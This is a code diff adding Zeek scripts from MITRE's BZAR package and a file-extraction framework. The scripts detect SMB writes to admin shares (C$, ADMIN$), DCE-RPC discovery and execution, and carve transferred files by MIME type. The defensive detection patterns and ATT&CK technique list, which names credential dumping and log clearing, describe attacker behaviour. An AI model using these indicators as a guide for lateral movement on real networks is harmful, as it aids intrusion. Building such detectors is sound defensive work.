+	#       would confirm the file was actually written to the 
+	#       remote destination.  Unfortuantely, Bro/Zeek does 
+	#       not have an event for that SMB message-type yet.
+
+	local smb_action = "SMB::FILE_WRITE to";
+
+	# Check if detect_option is True &&
+	# Check if SMB Tree Path is an Admin File Share
+
+	if ( BZAR::t1021_002_t1570_detect_option &&
+	     BZAR::smb_admin_file_share_test(c$smb_state) )
+	{
+		# Looks like:
+		# T1570 Lateral Tool Transfer &&
+		# T1021.002 Remote Services: SMB/Windows Admin Shares (File Shares Only)
+
+		# Raise Notice and/or Set Observation
+		BZAR::smb_t1021_002_t1570_log(c, smb_action);
+	}
+}
+
+
+# #
+# # WARNING: No event generated for SMB2_WRITE_RESPONSE
+# #
+#event smb2_write_response(c: connection, hdr: SMB2::Header, file_id: SMB2::GUID, written_bytes: count) &priority=3
+#{
+#	# Keep track of the number of bytes in the Write Response. 
+#	# priority==3 ... We want to execute before writing to smb_files.log
+#	c$smb_state$current_file$data_len_rsp = written_bytes;
+#}
+
+#event smb2_write_response(c: connection, hdr: SMB2::Header, file_id: SMB2::GUID, written_bytes: count) &priority=-5
+#{
+#	SMB::write_file_log(c$smb_state); 
+#}
+
+#end bzar_smb2_detect.zeek
--- a/capitalone/external/mitre_bzar/bzar_smb_consts.zeek
+++ b/capitalone/external/mitre_bzar/bzar_smb_consts.zeek
@ -0,0 +1,57 @@
+#
+# File: bzar_smb_consts.zeek
+# Created: 20180701
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+export
+{
+	# ATT&CK - Lateral Movement Techniques
+	#
+	# Windows Admin File Shares (eg, ADMIN$ or C$) used for
+	# Lateral Movement onto the remote system
+	#
+	# Relevant ATT&CK Technique(s):
+	#    T1021.002 Remote Services: SMB/Windows Admin Shares [File Shares Only]
+	#    T1570 Lateral Tool Transfer
+
+	const smb_admin_file_shares = vector
+	(
+		/\\c\$/i,
+		/\\admin\$/i
+
+	) &redef;
+
+	# Add these details about SMB::FILE_WRITE actions to smb_files.log
+	# in case an existing file is overwritten, rather than a new file
+	# being created.  These details would show if the existing file is
+	# overwritten in its entirety, or just a smaller sub-section is
+	# overwritten, which would be an interesting diagnostic to detect.
+
+@if ((Version::info$major == 2) && (Version::info$minor <= 5))
+	# Use this syntax for Bro v2.5.x and below
+	redef SMB::write_cmd_log	=  T &redef;
+@endif
+	redef SMB::logged_file_actions	+= { SMB::FILE_WRITE, } &redef;
+
+	redef record SMB::FileInfo	+= 
+	{
+		# Keep track of how many bytes written for
+		# SMB:FILE_WRITE request and response.
+		#
+		# This could be an interesting diagnostic for 
+		# SMB::FILE_READ too, but not implemented yet.
+
+		data_offset_req	: count &optional &log; # File offset to first byte to write/read
+		data_len_req	: count &optional &log; # How many bytes to write/read
+		data_len_rsp	: count &optional &log; # How many bytes written/read
+	};
+}
+#end export
+
+#end bzar_smb_consts.zeek
--- a/capitalone/external/mitre_bzar/bzar_smb_report.zeek
+++ b/capitalone/external/mitre_bzar/bzar_smb_report.zeek
@ -0,0 +1,275 @@
+#
+# File: bzar_smb_report.zeek
+# Created: 20180701
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+#
+# Helper Functions
+#
+
+function smb_full_path_and_file_name ( s : SMB::State ) : string
+{
+	local tree_name = "";
+	local file_name = "";
+
+	if ( s$current_file?$path )
+		tree_name = s$current_file$path;
+
+	if ( s$current_file?$name )
+		file_name = s$current_file$name;
+
+	return fmt("%s%s", tree_name, file_name);
+}
+
+
+function smb_tree_name ( s : SMB::State ) : string
+{
+	local tree_name : string;
+
+	if ( s?$current_file && s$current_file?$path )
+	{
+		tree_name = s$current_file$path;
+	}
+	else if ( s$current_cmd?$referenced_file && s$current_cmd$referenced_file?$path )
+	{
+		tree_name = s$current_cmd$referenced_file$path;
+	}
+	else if ( s?$current_tree && s$current_tree?$path )
+	{
+		tree_name = s$current_tree$path;
+	}
+	else if ( s$current_cmd?$referenced_tree && s$current_cmd$referenced_tree?$path )
+	{
+		tree_name = s$current_cmd$referenced_tree$path;
+	}
+	else {
+		tree_name = "";
+	}	
+
+	return tree_name;
+}
+
+
+function smb_admin_file_share_test ( s : SMB::State ) : bool
+{
+	local tree_name : string;
+
+	if ( s?$current_file && s$current_file?$path )
+	{
+		tree_name = s$current_file$path;
+	}
+	else if ( s$current_cmd?$referenced_file && s$current_cmd$referenced_file?$path )
+	{
+		tree_name = s$current_cmd$referenced_file$path;
+	}
+	else if ( s?$current_tree && s$current_tree?$path )
+	{
+		tree_name = s$current_tree$path;
+	}
+	else if ( s$current_cmd?$referenced_tree && s$current_cmd$referenced_tree?$path )
+	{
+		tree_name = s$current_cmd$referenced_tree$path;
+	}
+	else {
+		tree_name = "";
+	}	
+
+	local a = 0;
+	local b = |BZAR::smb_admin_file_shares|;
+
+	while ( a < b )
+	{
+		if ( BZAR::smb_admin_file_shares[a] in tree_name ) { return T; }
+		++a;
+	}
+
+	return F;
+}
+
+
+function smb_t1021_002_log ( c : connection, action : string ) : bool
+{
+	# T1021.002 Remote Services: SMB/Windows Admin Shares
+	# (file shares only, not named pipes)
+	#
+	# Indicators
+	# 01:	SMB1-Tree-Connect-Request to ADMIN$ or C$
+	#	SMB2-Tree-Connect-Request to ADMIN$ or C$
+	#
+	# Analytics
+	# 01:	Detect single instance of SMB-Write to ADMIN$ or C$
+	#
+	# Reporting
+	# 01:	Write to notice.log:
+	#	"ATTACK::Lateral_Movement"<tab>
+	#	"Detected SMB::TREE_CONNECT to admin file share '<smb_tree_name>'"<tab>
+	#	"T1021.002 Remote Services: SMB/Windows Admin Shares + T1570 Lateral Tool Transfer"
+	#
+	# 02:	Set Observation for SumStats
+
+	#
+	# Raise Notice
+	#
+
+	if ( t1021_002_report_option ) 
+	{
+		# Get whitelist from config options
+		local w1 : BZAR::EndpointWhitelist;
+
+		w1$orig_addrs   = t1021_002_whitelist_orig_addrs;
+		w1$resp_addrs   = t1021_002_whitelist_resp_addrs;
+
+		w1$orig_subnets = t1021_002_whitelist_orig_subnets;
+		w1$resp_subnets = t1021_002_whitelist_resp_subnets;
+
+		w1$orig_names   = t1021_002_whitelist_orig_names;
+		w1$resp_names   = t1021_002_whitelist_resp_names;
+
+		# Check whitelist
+		if ( !BZAR::whitelist_test(c$id$orig_h, c$id$resp_h, w1) )
+		{
+			local notice_msg = "Detected %s admin file share \'%s\'";
+			local tree_name  = BZAR::smb_tree_name(c$smb_state);
+
+			NOTICE([$note=ATTACK::Lateral_Movement,
+				$msg=fmt(notice_msg, action, tree_name),
+				$sub=BZAR::attack_info["t1021.002"],
+				$conn=c]
+			);
+		}
+	}
+
+	#
+	# Set Observation
+	#
+
+	if ( t1021_002_multiple_attempts_report_option )
+	{
+		# Get whitelist from config options
+		local w2 : BZAR::EndpointWhitelist;
+
+		w2$orig_addrs   = t1021_002_multiple_attempts_whitelist_orig_addrs;
+		w2$resp_addrs   = t1021_002_multiple_attempts_whitelist_resp_addrs;
+
+		w2$orig_subnets = t1021_002_multiple_attempts_whitelist_orig_subnets;
+		w2$resp_subnets = t1021_002_multiple_attempts_whitelist_resp_subnets;
+
+		w2$orig_names   = t1021_002_multiple_attempts_whitelist_orig_names;
+		w2$resp_names   = t1021_002_multiple_attempts_whitelist_resp_names;
+
+		# Check whitelist
+		if ( !BZAR::whitelist_test(c$id$orig_h, c$id$resp_h, w2) )
+		{
+			SumStats::observe("attack_lm_multiple_t1021_002",
+				  SumStats::Key($host=c$id$orig_h),
+				  SumStats::Observation($num=1)
+			);
+		}
+	}
+
+	return T;
+}
+
+
+function smb_t1021_002_t1570_log ( c : connection, action : string ) : bool
+{
+	# T1021.002 Remote Services: SMB/Windows Admin Shares
+	# (file shares only, not named pipes)
+	#
+	# Indicators
+	# 01:	SMB1-Tree-Connect-Request to ADMIN$ or C$
+	#	SMB2-Tree-Connect-Request to ADMIN$ or C$
+	#
+	# 02:	SMB1-Write-Response
+	#	SMB2-Write-Request*
+	#
+	#	* NOTE: Bro/Zeek event for SMB2-Write-Response was introduced
+	#	  in Zeek v3.0.0.  Therefore, for Bro v2.6 (and earlier), need
+	#	  to use SMB2-Write-Request event instead.
+	#
+	# Analytics
+	# 01:	Detect single instance of SMB-Write to ADMIN$ or C$
+	#
+	# Reporting
+	# 01:	Write to notice.log:
+	#	"ATTACK::Lateral_Movement"<tab>
+	#	"Detected SMB::FILE_WRITE to admin file share '<smb_file_name>'"<tab>
+	#	"T1021.002 Remote Services: SMB/Windows Admin Shares + T1570 Lateral Tool Transfer"
+	#
+	# 02:	Set Observation for SumStats
+
+	#
+	# Raise Notice
+	#
+
+	if ( t1021_002_t1570_report_option )
+	{
+		# Get whitelist from config options
+		local w1 : BZAR::EndpointWhitelist;
+
+		w1$orig_addrs   = t1021_002_t1570_whitelist_orig_addrs;
+		w1$resp_addrs   = t1021_002_t1570_whitelist_resp_addrs;
+
+		w1$orig_subnets = t1021_002_t1570_whitelist_orig_subnets;
+		w1$resp_subnets = t1021_002_t1570_whitelist_resp_subnets;
+
+		w1$orig_names   = t1021_002_t1570_whitelist_orig_names;
+		w1$resp_names   = t1021_002_t1570_whitelist_resp_names;
+
+		# Check whitelist
+		if ( !BZAR::whitelist_test(c$id$orig_h, c$id$resp_h, w1) )
+		{
+			local t1 = BZAR::attack_info["t1021.002"];
+			local t2 = BZAR::attack_info["t1570"];
+
+			local notice_msg = "Detected %s admin file share \'%s\'";
+			local file_name  = BZAR::smb_full_path_and_file_name(c$smb_state);
+
+			NOTICE([$note=ATTACK::Lateral_Movement,
+				$msg=fmt(notice_msg, action, file_name),
+				$sub=fmt("%s + %s", t1, t2),
+				$conn=c]
+			);
+		}
+	}
+
+	#
+	# Set Observation
+	#
+
+	if ( attack_lm_ex_report_option )
+	{
+		# Get whitelist from config options
+		local w2 : BZAR::EndpointWhitelist;
+
+		w2$orig_addrs   = attack_lm_ex_whitelist_orig_addrs;
+		w2$resp_addrs   = attack_lm_ex_whitelist_resp_addrs;
+
+		w2$orig_subnets = attack_lm_ex_whitelist_orig_subnets;
+		w2$resp_subnets = attack_lm_ex_whitelist_resp_subnets;
+
+		w2$orig_names   = attack_lm_ex_whitelist_orig_names;
+		w2$resp_names   = attack_lm_ex_whitelist_resp_names;
+
+		# Check whitelist
+		if ( !BZAR::whitelist_test(c$id$orig_h, c$id$resp_h, w2) )
+		{
+			# Score == 1 for SMB::FILE_WRITE
+
+			SumStats::observe("attack_lm_ex",
+				  SumStats::Key($host=c$id$resp_h),
+				  SumStats::Observation($num=1)
+			);
+		}
+	}
+
+	return T;
+}
+
+#end bzar_smb_report.zeek
--- a/capitalone/external/mitre_bzar/dpd.sig
+++ b/capitalone/external/mitre_bzar/dpd.sig
@ -0,0 +1,16 @@
+#
+# File: dpd.sig
+# Created: 20180701
+# Updated: 20190225
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-2489.
+#
+
+signature dpd_smb3 { 
+	ip-proto == tcp 
+	payload /^....[\xfd]SMB/ 
+	enable "smb" 
+} 
+
+#end dpd.sig
--- a/capitalone/external/mitre_bzar/main.zeek
+++ b/capitalone/external/mitre_bzar/main.zeek
@ -0,0 +1,356 @@
+#
+# File: main.zeek
+# Created: 20180701
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+@if ((Version::info$major == 2) && (Version::info$minor <= 5))
+
+# Use this syntax for Bro v2.5.x and below
+@load policy/protocols/smb
+
+@else
+
+# Use this syntax for Bro v2.6.x and above
+@load base/protocols/smb
+
+@endif
+
+@load base/protocols/dce-rpc
+@load base/frameworks/files
+@load base/frameworks/notice
+@load base/frameworks/sumstats
+
+module BZAR;
+
+export
+{
+	# NOTICE - Raise Notices for these ATT&CK Tactics & Categories
+
+	redef enum Notice::Type +=
+	{
+		ATTACK::Credential_Access,
+		ATTACK::Defense_Evasion,
+		ATTACK::Discovery,
+		ATTACK::Execution,
+		ATTACK::Impact,
+		ATTACK::Lateral_Movement,
+		ATTACK::Lateral_Movement_and_Execution,
+		ATTACK::Lateral_Movement_Extracted_File,
+		ATTACK::Lateral_Movement_Multiple_Attempts,
+		ATTACK::Persistence,
+	};
+
+	# Full descriptive name of each ATT&CK Technique
+	# Used in BZAR Reporting
+
+	const attack_info : table[string] of string = 
+	{
+		["t1003.006"] = "T1003.006 OS Credential Dumping: DCSync", 
+		["t1547.004"] = "T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL",
+		["t1547.010"] = "T1547.010 Boot or Logon Autostart Execution: Port Monitors",
+		["t1016"] = "T1016 System Network Configuration Discovery",
+		["t1018"] = "T1018 Remote System Discovery",
+		["t1033"] = "T1033 System Owner/User Discovery",
+		["t1569.002"] = "T1569.002 System Services: Service Execution",
+		["t1047"] = "T1047 WMI",
+		["t1049"] = "T1049 System Network Connections Discovery",
+		["t1053.002"] = "T1053.002 Scheduled Task/Job: At",
+		["t1053.005"] = "T1053.005 Scheduled Task/Job: Scheduled Task",
+		["t1069"] = "T1069 Permission Groups Discovery",
+		["t1070.001"] = "T1070.001 Indicator Removal on Host: Clear Windows Event Logs",
+		["t1021.002"] = "T1021.002 Remote Services: SMB/Windows Admin Shares",
+		["t1082"] = "T1082 System Information Discovery",
+		["t1083"] = "T1083 File and Directory Discovery",
+		["t1087"] = "T1087 Account Discovery",
+		["t1570"] = "T1570 Lateral Tool Transfer",
+		["t1124"] = "T1124 System Time Discovery",
+		["t1135"] = "T1135 Network Share Discovery",
+		["t1529"] = "T1529 System Shutdown/Reboot",
+	} &redef;
+
+	type EndpointWhitelist : record
+	{
+		# Specify IP Addresses to ignore
+		orig_addrs : set[addr] &optional;
+		resp_addrs : set[addr] &optional;
+
+		# Specify IP Subnets to ignore
+		orig_subnets : set[subnet] &optional;
+		resp_subnets : set[subnet] &optional;
+
+		# Specify Host Names to ignore
+		orig_names : set[string] &optional;
+		resp_names : set[string] &optional;
+	} &redef;
+}
+#end export
+
+
+#
+# Helper Functions
+#
+
+function whitelist_test( orig_h : addr, resp_h : addr, w : BZAR::EndpointWhitelist ) : bool
+{
+	local match : bool = F;
+
+	#
+	# Check if Endpoint IP Addrs are Associated with Whitelist
+	#
+
+	if ( w?$orig_addrs && (orig_h in w$orig_addrs) )
+	{
+		match = T;
+	}
+	else if ( w?$resp_addrs && (resp_h in w$resp_addrs) )
+	{
+		match = T;
+	}
+	else if ( w?$orig_subnets && (orig_h in w$orig_subnets) )
+	{
+		match = T;
+	}
+	else if ( w?$resp_subnets && (resp_h in w$resp_subnets) )
+	{
+		match = T;
+	}
+	else if ( w?$orig_names )
+	{
+@if ( Version::number >= 50000 )
+		when [w, orig_h, match] ( (local n1 = lookup_addr(orig_h)) && (n1 in w$orig_names) ) {
+@else
+		when ( (local n1 = lookup_addr(orig_h)) && (n1 in w$orig_names) ) {
+@endif
+			match = T;
+		}
+		timeout BZAR::whitelist_dns_timeout
+		{
+			match = F;
+		}
+	}
+	else if ( w?$resp_names )
+	{
+@if ( Version::number >= 50000 )
+		when [w, resp_h, match] ( (local n2 = lookup_addr(resp_h)) && (n2 in w$resp_names) ) {
+@else
+		when ( (local n2 = lookup_addr(resp_h)) && (n2 in w$resp_names) ) {
+@endif
+			match = T;
+		}
+		timeout BZAR::whitelist_dns_timeout
+		{
+			match = F;
+		}
+	}
+
+	return match;
+}
+
+
+function sort_func( a : double, b : double ) : int
+{
+	if ( a < b)
+		return -1;
+	else
+		return 1;
+}
+
+
+#
+# BZAR Initialization
+#
+
+@if ( Version::info$major >= 3 )
+
+# Use this syntax for Zeek v3.x.x and above
+event zeek_init()
+{
+
+@else
+
+# Use this syntax for Bro v2.x.x and below
+event bro_init()
+{
+
+@endif
+
+	# 1- SumStats Analytics for ATT&CK Lateral Movement and Execution
+	#
+	# Description:
+	#    Use SumStats to raise a Bro/Zeek Notice event if an SMB Lateral Movement 
+	#    indicator (e.g., SMB File Write to a Windows Admin File Share: ADMIN$ or 
+	#    C$ only) is observed together with a DCE-RPC Execution indicator against 
+	#    the same (targeted) host, within a specified period of time.
+	#
+	# Relevant ATT&CK Technique(s):
+	#    T1021.002 Remote Services: SMB/Windows Admin Shares (file shares only, not
+	#    named pipes) && T1570 Lateral Tool Transfer && (T1569.002 System Services:
+	#    Service Execution|| T1047 WMI || T1053.002 Scheduled Task/Job: At ||
+	#    T1053.005 Scheduled Task/Job: Scheduled Task)
+	#
+	# Relevant Indicator(s) Detected by Bro/Zeek:
+	#    (a) smb1_write_andx_response::c$smb_state$path contains ADMIN$ or C$
+	#    (b) smb2_write_request::c$smb_state$path contains ADMIN$ or C$**
+	#    (c) dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation contains 
+	#        any of the following:
+	#          BZAR::t1569_002_rpc_strings
+	#          BZAR::t1047_rpc_strings
+	#          BZAR::t1053_002_rpc_strings
+	#          BZAR::t1053_005_rpc_strings
+	# 
+	# **NOTE: Preference would be to detect 'smb2_write_response' 
+	#       event (instead of 'smb2_write_request'), because it 
+	#       would confirm the file was actually written to the 
+	#       remote destination.  Unfortuantely, Bro/Zeek does 
+	#       not have an event for that SMB message-type yet.
+	#
+	# Globals (defined in bzar_config_options.zeek):
+	#    bzar1_epoch
+	#    bzar1_limit
+
+	local bzar1 = SumStats::Reducer(
+		$stream="attack_lm_ex",
+		$apply=set(SumStats::SUM, SumStats::MAX, SumStats::MIN)
+	);
+
+	SumStats::create([
+		$name = "attack_lm_ex_notice",
+		$reducers  = set(bzar1),
+		$epoch     = bzar1_epoch,
+		$threshold = bzar1_limit,
+		$threshold_val (key:SumStats::Key, result:SumStats::Result) =
+		{
+			return result["attack_lm_ex"]$sum;
+		},
+		$threshold_crossed(key:SumStats::Key, result:SumStats::Result) = 
+		{
+			local r = result["attack_lm_ex"];
+
+			# Ensure at least one RPC_EXEC was observed and
+			# at least one SMB_WRITE was observed
+
+			if ( r$max == 1000 && r$min == 1 )
+			{ 
+				local s = fmt("Detected activity against host %s, total score %.0f within timeframe %s", key$host, r$sum, bzar1_epoch);
+
+				# Raise Notice
+				NOTICE([$note=ATTACK::Lateral_Movement_and_Execution,
+					$msg=s]
+				);
+			}
+		}
+	]);
+
+
+	# 2- SumStats Analytics for ATTACK Lateral Movement (Multiple Attempts)
+	#
+	# Description:
+	#    Use SumStats to raise a Bro/Zeek Notice event if multiple SMB Lateral 
+	#    Movement indicators (e.g., multiple attempts to connect to a Windows Admin
+	#    File Share: ADMIN$ or C$ only) are observed originating from the same host, 
+	#    regardless of write-attempts and regardless of whether or not any connection
+	#    is successful --just connection attempts-- within a specified period of time.
+	#
+	# Relevant ATT&CK Technique(s):
+	#    T1021.002 SMB/Windows Admin Shares (file shares only, not named pipes)
+	#
+	# Relevant Indicator(s) Detected by Bro/Zeek:
+	#    (a) smb1_tree_connect_andx_request::c$smb_state$path contains ADMIN$ or C$
+	#    (b) smb2_tree_connect_request::c$smb_state$path contains ADMIN$ or C$
+	#
+	# Globals (defined in bzar_config_options.zeek):
+	#    bzar2_epoch
+	#    bzar2_limit
+
+	local bzar2 = SumStats::Reducer(
+		$stream="attack_lm_multiple_t1021_002",
+		$apply=set(SumStats::SUM)
+	);
+
+	SumStats::create([
+		$name = "attack_t1021_002_notice",
+		$reducers  = set(bzar2),
+		$epoch     = bzar2_epoch,
+		$threshold_series = sort(bzar2_limit, sort_func),
+		$threshold_val (key:SumStats::Key, result:SumStats::Result) =
+		{
+			return result["attack_lm_multiple_t1021_002"]$sum;
+		},
+		$threshold_crossed(key:SumStats::Key, result:SumStats::Result) = 
+		{
+			local s = fmt("Detected T1021.002 Admin File Share activity from host %s, total attempts %.0f within timeframe %s", key$host, result["attack_lm_multiple_t1021_002"]$sum, bzar2_epoch);
+
+			# Raise Notice
+			NOTICE([$note=ATTACK::Lateral_Movement_Multiple_Attempts,
+				$msg=s]
+			);
+		}
+	]);
+
+
+	# 3- SumStats Analytics for ATTACK Discovery
+	#
+	# Description:
+	#    Use SumStats to raise a Bro/Zeek Notice event if multiple instances of 
+	#    DCE-RPC Discovery indicators are observed originating from the same host, 
+	#    within a specified period of time.
+	#
+	# Relevant ATT&CK Technique(s):
+	#    T1016 System Network Configuration Discovery
+	#    T1018 Remote System Discovery 
+	#    T1033 System Owner/User Discovery 
+	#    T1069 Permission Groups Discovery 
+	#    T1082 System Information Discovery
+	#    T1083 File & Directory Discovery
+	#    T1087 Account Discovery
+	#    T1124 System Time Discovery
+	#    T1135 Network Share Discovery
+	#
+	# Relevant Indicator(s) Detected by Bro/Zeek:
+	#    (a) dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation contains 
+	#        any of the following:
+	#          BZAR::t1016_rpc_strings
+	#          BZAR::t1018_rpc_strings
+	#          BZAR::t1033_rpc_strings
+	#          BZAR::t1069_rpc_strings
+	#          BZAR::t1082_rpc_strings
+	#          BZAR::t1083_rpc_strings
+	#          BZAR::t1087_rpc_strings
+	#          BZAR::t1124_rpc_strings
+	#          BZAR::t1135_rpc_strings
+	# 
+	# Globals (defined in bzar_config_options.zeek):
+	#    bzar3_epoch
+	#    bzar3_limit
+
+	local bzar3 = SumStats::Reducer(
+		$stream="attack_discovery",
+		$apply=set(SumStats::SUM)
+	);
+
+	SumStats::create([
+		$name = "attack_discovery_notice",
+		$reducers  = set(bzar3),
+		$epoch     = bzar3_epoch,
+		$threshold_series = sort(bzar3_limit, sort_func),
+		$threshold_val (key:SumStats::Key, result:SumStats::Result) =
+		{
+			return result["attack_discovery"]$sum;
+		},
+		$threshold_crossed(key:SumStats::Key, result:SumStats::Result) = 
+		{
+			local s = fmt("Detected activity from host %s, total attempts %.0f within timeframe %s", key$host, result["attack_discovery"]$sum, bzar3_epoch);
+
+			# Raise Notice
+			NOTICE([$note=ATTACK::Discovery,
+				$msg=s]
+			);
+		}
+	]);
+}
+
+#end main.zeek
--- a/capitalone/frameworks/.DS_Store
+++ b/capitalone/frameworks/.DS_Store
--- a/capitalone/frameworks/files/extraction/load.zeek
+++ b/capitalone/frameworks/files/extraction/load.zeek
@ -0,0 +1 @@
+@load ./file_extraction.zeek
--- a/capitalone/frameworks/files/extraction/fe.conf
+++ b/capitalone/frameworks/files/extraction/fe.conf
@ -0,0 +1,41 @@
+#fields	mimetype	extension	protocols
+application/x-dosexec	exe	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-msdownload	dll	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/octet-stream	bin	HTTP IRC_DATA FTP_DATA SMTP SMB
+video/x-flv	flv	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-shockwave-flash	swf	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/pdf	pdf	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-director	swf	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-msaccess	mdb	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-cab-compressed	cab	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-excel	xls	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-excel.addin.macroenabled.12	xlam	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-excel.sheet.binary.macroenabled.12	xlsb	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-excel.template.macroenabled.12	xltm	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-excel.sheet.macroenabled.12	xlsm	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.presentationml.presentation	pptx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.presentationml.slide	sldx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.presentationml.slideshow	ppsx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.presentationml.template	potx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.spreadsheetml.sheet	xlsx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.spreadsheetml.template	xltx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.wordprocessingml.document	docx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.openxmlformats-officedocument.wordprocessingml.template	dotx	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-powerpoint	ppt	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.ms-project	mpp	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.visio	vsd	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/msword	doc	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-compressed	tgz	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-zip-compressed	zip	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/zip	zip	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-rar-compressed	rar	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-gzip-compressed	gz	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-gtar	tar	HTTP IRC_DATA FTP_DATA SMTP SMB
+multipart/x-gzip	gz	HTTP IRC_DATA FTP_DATA SMTP SMB
+multipart/x-zip	zip	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-7z-compressed	7z	HTTP IRC_DATA FTP_DATA SMTP SMB
+message/rfc822	rfc822	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/x-dmg	dmg	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/postscript	ps	HTTP IRC_DATA FTP_DATA SMTP SMB
+application/vnd.tcpdump.pcap	pcap	HTTP IRC_DATA FTP_DATA SMTP SMB
+*	unknown	IRC_DATA FTP_DATA
--- a/capitalone/frameworks/files/extraction/file_extraction.zeek
+++ b/capitalone/frameworks/files/extraction/file_extraction.zeek
@ -0,0 +1,125 @@
+# Gitlab bro_hunter's Repository
+#
+# Original Author: Aaron Eppert (aeppert@gmail.com / aaron@eppert.co )
+#
+
+module FILE_EXTRACTION;
+
+type MimeVal: record {
+    extension: string;
+    protocols: set[string];
+};
+
+type MimeConfVal: record {
+    mimetype: string;
+	extension: string;
+    protocols: string;
+};
+
+redef FileExtract::prefix = "/data/bro/file_extraction/";
+
+export {
+    global _mime_map: table[string] of MimeVal = table();
+    global fe_config_filename = @DIR + "./fe.conf" &redef;
+
+     ## Enable MD5 hash for known file types (Default - T)
+    const enable_md5_hash_for_known_types = T &redef;
+
+    ## Enable SHA1 hash for known file types (Default - T)
+    const enable_sha1_hash_for_known_types = T &redef;
+
+    ## Enable SHA256 hash for known file types (Default - T)
+    const enable_sha256_hash_for_known_types = T &redef;
+}
+
+function check_protos(proto: string, protocols: set[string]): bool {
+    if( (|protocols| > 0 && |proto| > 0) && (proto in protocols || "*" in protocols)) {
+        return T;
+    }
+    return F;
+}
+
+# Return based on mt OR if "*" exists as a key, return that as that is the
+# catch all case.
+function get_MimeVal(mt: string): MimeVal {
+    local ret: MimeVal;
+    if( |mt| > 0 && (mt in _mime_map)) {
+        ret = _mime_map[mt];
+    } else {
+        if( "*" in _mime_map ) {
+            ret = _mime_map["*"];
+        }
+    }
+    return ret;
+}
+
+event line(description: Input::EventDescription, tpe: Input::Event, mcv: MimeConfVal) {
+	local tmp: MimeVal;
+
+    if ( mcv?$extension ) {
+    	tmp$extension = mcv$extension;
+
+        if ( mcv?$protocols ) {
+        	local tmp_sv = split_string(mcv$protocols, / /);
+
+        	for(proto in tmp_sv) {
+        	 	add tmp$protocols[tmp_sv[proto]];
+        	}
+        }
+
+    	_mime_map[mcv$mimetype] = tmp;
+    }
+}
+
+event zeek_init() &priority=20 {
+	Input::add_event([$source=fe_config_filename, $name="feconf", $fields=MimeConfVal, $ev=line, $mode=Input::REREAD]);
+}
+
+event file_sniff(f: fa_file, meta: fa_metadata) {
+    local ext = "";
+
+	if( meta?$mime_type ) {
+        local mv = get_MimeVal(meta$mime_type);
+        if ( mv?$extension ) {
+            ext = mv$extension;
+
+            if ( !check_protos(f$source, mv$protocols) ) {
+    		    return;
+    	    }
+
+            local output_dir = fmt("%s", FileExtract::prefix);
+            local fe_dir: vector of string = vector( f$source,
+                                             fmt("%s", strftime("%Y", current_time())),
+                                             fmt("%s", strftime("%m", current_time())),
+                                             fmt("%s", strftime("%d", current_time())),
+                                             fmt("%s", strftime("%H", current_time())),
+                                             fmt("%s", strftime("%M", current_time())));
+
+            for( d in fe_dir ) {
+                output_dir = output_dir + "/" + fe_dir[d];
+                mkdir(output_dir);
+            }
+
+            local time_dir = fmt("%s", strftime("%Y/%m/%d/%H/%M", current_time()));
+            local fname = fmt("%s/%s/%s", f$source, time_dir, f$id);
+
+            if ( |ext| != 0 ) {
+                fname = fmt("%s/%s/%s.%s", f$source, time_dir, f$id, ext);
+        
+                if ( FILE_EXTRACTION::enable_md5_hash_for_known_types ) {
+                    Files::add_analyzer(f, Files::ANALYZER_MD5);
+                }
+
+                if ( FILE_EXTRACTION::enable_sha1_hash_for_known_types ) {
+                    Files::add_analyzer(f, Files::ANALYZER_SHA1);
+                }
+
+                if ( FILE_EXTRACTION::enable_sha256_hash_for_known_types ) {
+                    Files::add_analyzer(f, Files::ANALYZER_SHA256);
+                }
+                
+                Files::add_analyzer(f, Files::ANALYZER_EXTRACT, [$extract_filename=fname]);
+            } 
+        }
+    }
+}
